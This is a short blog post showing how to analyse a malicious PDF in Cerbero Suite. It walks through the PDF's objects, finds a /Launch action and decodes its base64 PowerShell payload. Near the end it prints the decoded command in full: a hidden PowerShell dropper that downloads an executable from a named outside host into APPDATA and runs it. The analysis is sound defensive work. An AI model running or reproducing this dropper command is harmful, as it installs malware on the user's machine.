Hi Fellow Friends,
Finally, I can write this blog space again after sometimes focusing on another thing. Today, I would like to write about reversing malicious PDF to get detailed information of what it is trying to do with our endpoint
Many tools could help you during analysis, but today I will use one integrated tool for file analysis called Cerbero Suite Advance. I love this application because it gives the most functionality to do file analysis
Let’s get started. Let’s open the malware sample by right-clicking on it and analyze it with Cerbero
Cerbero can fully parse PDF data structure and show them in a structured way. We can see in the image below that cerbero will directly give you hints that the application has a threat inside.
We can see that the PDF file has five objects. We can start to analyze the file start from object number one. We can select the object from the format windows.
Cerbero will give you information about the object in the raw data window
We can understand that this object does /Launch/Win action when the document is opened. It is shown that the pdf will start the PowerShell command with base64 encoding.
We can also see the hierarchy of the object in the tree tab like shown below, which is more clearer
To do further analyses for what command will run, we can copy the item and paste it to the text analysis window.
And open a new text window for analysis. We can see that the PowerShell will execute encoded command with window style hidden. It is suspicious, right.
Let’s start decoding the PowerShell command with base64. It is straightforward to crack it with cerbero. You can select the base64 encoded text and press CTRL+R, and select Base64 to bytes
it will show you the result in the hexstring window
here is the full code command execution that the powershell trigger on start
PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object SystemNetWebClient)DownloadFile(‘http://ncdugandaorg/css/aworiexe’, $env:APPDATA\aworiexe );Start-Process ( $env:APPDATA\aworiexe )
Now we can understand that the powershell will download the malware from http://ncdugandaorg/css/aworiexe and execute it in hidden window.
i would like to encourage the malware analyst to use cerbero to do file analysis. it has various feature that make your life easier